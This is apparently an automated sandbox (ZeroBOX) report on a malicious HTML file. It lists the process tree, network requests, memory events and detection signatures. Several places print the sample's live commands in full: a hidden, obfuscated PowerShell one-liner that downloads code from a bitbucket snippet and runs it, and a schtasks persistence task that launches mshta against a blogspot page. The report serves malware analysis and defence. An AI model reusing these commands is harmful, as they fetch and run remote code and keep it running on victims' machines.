Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 19, 2022, 11:30 a.m.	Jan. 19, 2022, 11:32 a.m.

Size	31.6KB
Type	HTML document, ASCII text, with very long lines
MD5	`8cafba8b9bf6d8223d678a826ece2e7f`
SHA256	`99dd1a32bb9e7be2168b48ef10277e01260c1da9df0ae9a6b864197c629fc873`
CRC32	`15A1FF49`
ssdeep	`768:nv3eyHHvPWdJPQKpMFcfUURHpXbuK92Ea:nv3LHH2dJPVtRHNuKm`
Yara	TESTYARA - (no description) Antivirus - Contains references to security software

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\blessed-1gg.html
2836
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2836 CREDAT:145409
  2936
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
    1660
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());
    2232

Name	Response	Post-Analysis Lookup
www.google-analytics.com	CNAME www-google-analytics.l.google.com A 142.250.207.78	142.251.42.174
accounts.google.com	A 172.217.24.109	142.251.42.173
fonts.gstatic.com	A 142.250.204.35 CNAME gstaticadssl.l.google.com	142.250.196.99
www.google.com	A 142.250.66.36	142.250.207.4
fonts.googleapis.com	A 142.250.204.106	216.58.197.234
www.blogger.com	CNAME blogger.l.google.com A 142.250.66.41	216.58.220.137
resources.blogblog.com	A 172.217.24.105 CNAME blogger.l.google.com	216.58.220.137
www.gstatic.com	A 172.217.27.35	216.58.220.131

IP Address	Status	Action
142.250.204.106	Active	Moloch
142.250.204.35	Active	Moloch
142.250.207.78	Active	Moloch
142.250.66.36	Active	Moloch
142.250.66.41	Active	Moloch
164.124.101.2	Active	Moloch
172.217.24.105	Active	Moloch
172.217.24.109	Active	Moloch
172.217.27.35	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 19, 2022, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 19, 2022, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 19, 2022, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 19, 2022, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 19, 2022, 11:23 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 19, 2022, 11:23 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Jan. 19, 2022, 11:23 a.m.	buffer: SUCCESS: The scheduled task "Bluefibxonashi" has successfully been created. console_handle: 0x0000000000000007	1	1	0

Uses Windows APIs to generate a cryptographic key (13 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000043bf90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b906550 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 19, 2022, 11:23 a.m.		1	1	0

Performs some HTTP requests (25 events)

request	GET https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css
request	GET https://www.blogger.com/static/v1/jsbin/2287435483-ieretrofit.js
request	GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=00ef967e-52bd-4145-aae3-9569cec9110f
request	GET https://www.blogger.com/static/v1/jsbin/3261120736-comment_from_post_iframe.js
request	GET https://www.blogger.com/static/v1/widgets/2922743057-widgets.js
request	GET https://www.blogger.com/blogin.g?blogspotURL=https://hogyatohonathawarnameinmargya.blogspot.com/p/blessed-1gg.html&type=blog
request	GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif
request	GET https://accounts.google.com/ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://hogyatohonathawarnameinmargya.blogspot.com/p/blessed-1gg.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://hogyatohonathawarnameinmargya.blogspot.com/p/blessed-1gg.html%26type%3Dblog%26bpli%3D1&go=true
request	GET https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fhogyatohonathawarnameinmargya.blogspot.com%2Fp%2Fblessed-1gg.html&type=blog&bpli=1
request	GET https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
request	GET https://fonts.googleapis.com/css?family=Open+Sans:300
request	GET https://www.google-analytics.com/analytics.js
request	GET https://www.google.com/css/maia.css
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
request	GET https://fonts.gstatic.com/s/opensans/v27/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4gaVQ.woff
request	GET https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=8365284475519832641&blogspotRpcToken=3720207&bpli=1
request	GET https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=8365284475519832641&blogspotRpcToken=3720207
request	GET https://accounts.google.com/ServiceLogin?passive=true&continue=https://www.blogger.com/comment-iframe.g?blogID%3D8965474558532949541%26pageID%3D8365284475519832641%26blogspotRpcToken%3D3720207%26bpli%3D1&followup=https://www.blogger.com/comment-iframe.g?blogID%3D8965474558532949541%26pageID%3D8365284475519832641%26blogspotRpcToken%3D3720207%26bpli%3D1&go=true
request	GET https://www.blogger.com/img/blogger-logotype-color-black-1x.png
request	GET https://www.blogger.com/img/share_buttons_20_3.png
request	GET https://fonts.googleapis.com/css?lang=ko&family=Product+Sans\|Roboto:400,700
request	GET https://fonts.gstatic.com/s/roboto/v29/KFOmCnqEu92Fr1Mu4mxM.woff
request	GET https://fonts.gstatic.com/s/roboto/v29/KFOlCnqEu92Fr1MmWUlfBBc-.woff
request	GET https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg

Allocates read-write-execute memory (usually to unpack itself) (50 out of 159 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 region_size: 7475200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002fd0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000036f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007737d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077384000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc575000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc575000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff6f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdf81000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007736a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000034b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000036f0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007737d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077384000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc575000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff6f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdf81000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007736a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 region_size: 12128256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000035c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007737d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000773a2000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\analytics[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\3261120736-comment_from_post_iframe[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\3101730221-analytics_autotrack[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\2922743057-widgets[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\2287435483-ieretrofit[1].js

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	schtasks /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
cmdline	pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 19, 2022, 11:30 a.m.	show_type: 0 filepath_r: schtasks parameters: /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html"" filepath: schtasks	1	1	0
ShellExecuteExW Jan. 19, 2022, 11:30 a.m.	show_type: 0 filepath_r: pOweRshell.exe parameters: -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend()); filepath: pOweRshell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 19, 2022, 11:30 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff70000 process_handle: 0xffffffffffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 19, 2022, 11:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
cmdline	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2836 CREDAT:145409
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""

Installs itself for autorun at Windows startup (2 events)

cmdline	schtasks /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	schtasks /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
